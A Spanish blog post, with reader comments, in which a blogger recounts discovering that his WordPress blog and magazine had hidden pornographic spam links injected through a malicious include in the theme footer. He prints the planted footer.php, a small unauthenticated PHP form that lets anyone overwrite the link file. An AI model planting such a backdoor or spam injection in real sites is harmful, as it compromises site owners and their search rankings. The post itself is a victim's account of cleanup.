Los piratas románticos: ¡piratean tu tema!
Julio, te he mandado un correo en Facebook,luego miralo, que es lo que me a contestado el chico que te…
He sufrido en mis carnes virtuales un pirateo en toda regla. Cuando Google me avisó de que tenía enlaces ocultos en mi blog y mi revista, creí que podría ser spam que no había eliminado en la portada.
Pero no. En mi blog, llegaban datos de que las palabras claves más buscadas eran incluso dominios con pornografía. A mí me extrañaba esa tendencia de las últimas semanas. Pero como tengo una sección de sexo y amor, pues tampoco le dí más importancia.
Pero en esto que voy a uno de esos sitios que enlazan mi blog -¿cómo es que aparece listado en un sitio porno, con caracteres chinos, un artículo sobre literatura?-, y veo, por sorpresa, que las palabras claves asociadas son las mismas que me había dicho Google en su email. ¿Cómo es eso? ¡No he solucionado el problema! X( X( X(
Tan sencillo como: voy a Firefox -aunque mantengo un idilio oculto con Chrome a sus espaldas-, voy a mi blog y le doy la opción de “Ver código fuente de la página”. ¡Qué! Ahí están, unos cincuenta o más enlaces, al final de la página. Lo simpático es que le doy a buscarlas, y Firefox me sitúa dónde deben estar, ¡pero no se ven! Trato de marcar la zona con el ratón, ¡y tampoco!
Pero, ¿cómo es esto? ¿Un plugin? Los desactivo todos. No, siguen ahí los enlaces. Voy al editor de temas. Y, justo al final del código del pié de página, una llamada en PHP extraña, haciendo mención a un fichero config.ini. ¿Config.ini alojado en otro directorio fuera de mi instalación de WordPress? ¿Será un plugin?
Voy al tema original para verificar que esa línea de código pertenece al tema. Pero no. La elimino. ¡Los enlaces ocultos desparecen!
Te he pillao, cabronazo. 😀 😀
Dos miedos: uno, ¿conocen mis claves de acceso? ¿Cómo? Y dos: ¿y de mi base de datos? X( X(
Lo primero que hago es cambiarlas todas, incluído el FTP. Reviso la base de datos, y no encuentro nuevas. Voy a mi revista literaria, Poesía+Letras. ¡También me han puesto el código aquí! Mi tema, de nuevo pirateado con esa referencia al config.ini. Lo borro.No salen ya los enlaces.
Reviso el tema original de mi revista. Hay dos archivos que no debían estar alojados en mi directorio. El config.ini y el footer.php. Config.ini es un archivo de texto con cincuenta enlaces, aproximadamente, porno. Esto pone el footer.php:
<?php
if(isset($_POST[‘kart’])){
$kart=stripslashes($_POST[‘kart’]);
$fp=fopen(“config.ini”,”w”);
fwrite($fp,$kart);
fclose($fp);
}
$old=file_get_contents(“config.ini”);
echo’
<form name=”body.php” method=”post” action=”footer.php”>
<TEXTAREA NAME=”kart” ROWS=”10″ COLS=”100″>’.$old.'</TEXTAREA><br>
<input type=”submit” value=”submit”>
</form>
‘;
?>
- Así que el tipo entra en mi directorio con mi clave por FTP.
- En vez de piratearme el sitio por todas partes y borrarme cosas o lo que sea, introduce un archivo con una lista de sitios porno.
- Modifica mis temas de la revista y de mi blog. ¡Es un artista del código! Seguro que es un puto pajero con una vida sexual de mierda. X(
- Introduce el texto oculto al final de cada tema haciendo una llamada al archivo Config.ini, que lee la lista de un tirón en cada artículo de mi blog.
- ¿Entrará de vez en cuando a introducir más enlaces o revisar su pirateo? Seguro. Es un cachondo del código. No folla porque es impotente, pero le pone el código.
Un romántico, el chaval. Me lo tengo que tomar con -mal- humor porque compito con alguien que estará acostumbrado a estas cosas y, lo peor peor que puede pasar es que tenga que cerrar el blog y la revisa. Pues abro otras -tras la depresión post-parto-. 😀
Así que cuidadito con tu tema si tienes un alquiler de espacio web y no un sitio en Blogger o WordPress gratuito. Porque se dedican a promocionar esos sitios que listan en secreto. Y luego, Google te dice: te hemos eliminado de nuestro directorio por usar palabras clave porno para promocionar tu sitio y hacerlo subir en el ránking. ¿Yo? De qué hablas. Pues sí, eso exactamente.
Es un pirateo de márketing: no buscan, creo, el placer de la batalla contra un sistema de seguridad. Buscan una rentabilidad económica: situar determinados sitios entre los más visitados -¿será una empresa?-. Ya he encontrado más que han sufrido esta técnica tan divertida.
Todavía me río. X( X( X(
¿Alguna sugerencia de ayuda sobre el tema? ¿Algo que se me haya pasado por alto? ¿Estoy confundido y me he saltado algún paso obvio, aparte de cambiar todas mis contraseñas y solicitar a mi alquiler que me cancele el acceso por FTP? Por favor, si crees que es así, y puedes echarme una ayudita, te lo agradeceré profundamente.
Mis conocimientos de seguridad son seguir las normas básicas que Joomla y WordPress me sugieren. Las he revisado y cumplo casi todas, salvo algunas que dicen que pueden crear problemas técnicos secundarios que no me siento capaz de resolver -como cambiar de lugar archivos config o directorios con contraseña-. Y la empresa que me alquila el espacio tiene un servicio técnico… :emotion: bueno, sin comentarios. X( X(
😀
[email_link]
Hola
menos mal que sabes informática, digo, perdón, chino
ja,ja, 🙂
menudo embrollo, espero lo soluciones
un abrazo
.-= Último artículo del blog de Jose… El hombre que envejeció en horas =-.
Buff, Julio me encantaría ayudarte pero no tengo ni p…ta idea :emotion: , si quieres puedo preguntar, que tengo un amiguete que sabe de Informatica, haber si el lo sabe…si te interesa me lo dices, y haber que podemos solucionar, desde luego la gente que poco tiene que hacer…
Un beso :p
.-= Último artículo del blog de pili”cuchillita”… JACKO "TIENE UN DOBLE" =-.
Julio le he mandado tu enlace, para que lo lea, y haber si te puede ayudar, que seguro que sí..OK
.-= Último artículo del blog de pili”cuchillita”… JACKO "TIENE UN DOBLE" =-.
@Pili: pues muchas gracias, estaría bien si no es molestia. Pensaba que lo tenía solucionado pero no. Me vuelven a salir esos archivos y no sé dónde jaja. Paso de comerme el coco. Como me vuelvan loco cierro el blog. 😀
Es impresioannte; cada vez se buscan tácticas más complejas y enrevesadas para obtener beneficio propio y publicidad, aunque sea base del trabajo ajeno.
El tema empieza a dar un poco de miedo, la verdad.
Desgraciadamente mis conocimientos sobre el tema son nulos, así que no te puedo ayudar, aunque por lo que cuentas creo que tu mismo te defiendes muy bien.
Un saludo.
.-= Último artículo del blog de Perséfone… Una vecina de Barcelona cuida a más de 60 gatos =-.
@Perfésone: Gracias por los ánimos, pero me ha vuelto a pasar y ahora sí que me despisté. No me voy a pasar el día borrando esos archivos. Ya veré que hago. Gracias por el apoyo. 😀
@yomisma: sí, gracias, lo sé, yo tampoco sé mucho más, eh. Pensaba que estaba solucionado y acabo de ver que me lo han vuelto a hacer -y lo he vuelto a borrar, pero no voy a estar todos los días así-.
Opción A: Borro todo y empiezo de cero, la revista incluída.
Opción B:¿Hay opción B? 😀
Si es que uno tiene que estar en tó… Lo siento torrijilla…en la era de la información de la desaparición de las fronteras…¡Nos vigilan!
¡vigilémoslos nosotros también! 8)
.-= Último artículo del blog de kiram… Pesadilla en el parque de atracciones.- Los planetas =-.
@Kiram: ¡jajaja! Lo de torrija me ha llegado al alma, ahora sí que te regalo por reyes. Es lo que hay. Estoy por irme a WordPress.com y meter allí el blog, o en Blogger. 😀
@yomisma: bueno, la opción A no es mala tampoco. Pero la B es paciencia… a ver qué tal… 😀
Gracias de nuevo. Ya en este artículo digo que si alguien sabe si me falta algo… Eso del alma de buen corazón está complicado… pero nunca se sabe, ¿no? 😀
editas en tu pc y luego descargas vía ftp a tu servidor?
mira a ver si el problema está en casa y se “exporta” a tu web. sólo por comprobar.
.-= Último artículo del blog de angel… ¡Qué importante son los colores! =-.
@angel: ¡Gracias angel! Estuve mirando ayer noche y me he empapado nuevas vías de pirateo jaja. Decir esto es arriesgado, pero mi portátil no creo que esté infectado por lo que he mirado… No descarto que un día lo pille, gracias por el aviso porque si me vuelve a pasar estoy “al loro” . Y he mirado este tipo de ataques en la red, que son más frecuentes de lo que creía. Se basan en sentencias SQL (sql injection spam), principalmente, o plugins de Joomla o WordPress con vulnerabilidades. Creo que se debe a cuando dejaba comentarios abiertos en la revista. Ahí introducen SQL; o puede ser que me han “robado” la clave, agujeros de mi servidor… estoy reforzando la seguridad pero me temo que aunque haga un curso acelerado, si un tío de esos quiere… porque se pone perretudo… En fin, muchas gracias por el aviso y el enlace, me ha servido de ayuda. ¡Un gran abrazo! Esto de la aventura de montarte una revista y un blog partiendo de conocimientos cero, por mucho que haya aprendido… siempre hay un paso más… ¡un abrazo! Ya te invitaré a unas cervezas, apúntalo 😀
y si no lo habías encontrado, tal vez te interese esto:
http://www.samuelaguilera.com/archivo/primer-fallo-seguridad-real-wordpress-25.xhtml
.-= Último artículo del blog de angel… ¡Qué importante son los colores! =-.
Hola Julio. he leido lo del pirateo y me he quedado de una pieza. Siento mucho no poder darte ninguna idea ni ayuda en cuanto a ello, porque mis conocimientos informáticos se limitan al de un simple usuario.
Pero la verdad es que esta ” persona “que esta haciendo eso, tiene muy mala leche.
BESOSSS.
Eva
@eva: Pues sí, hija, esto es así. Es para promocionar empresas propias sobre porno o lo que sea. Se dedican a estas cosas. La gente, se aburre. Todo es dinero. Besos linda y gracias por el apoyo 😀
Julio, te he mandado un correo en Facebook,luego miralo, que es lo que me a contestado el chico que te hable, creo que la mayoria de las cosas ya las has echo tú, pero de todas maneras, luego me dices algo, que hay que acabar con este pirateo que te tienen pero ¡YA!
Un besete :p
.-= Último artículo del blog de pili”cuchillita”… SUEÑOS…. =-.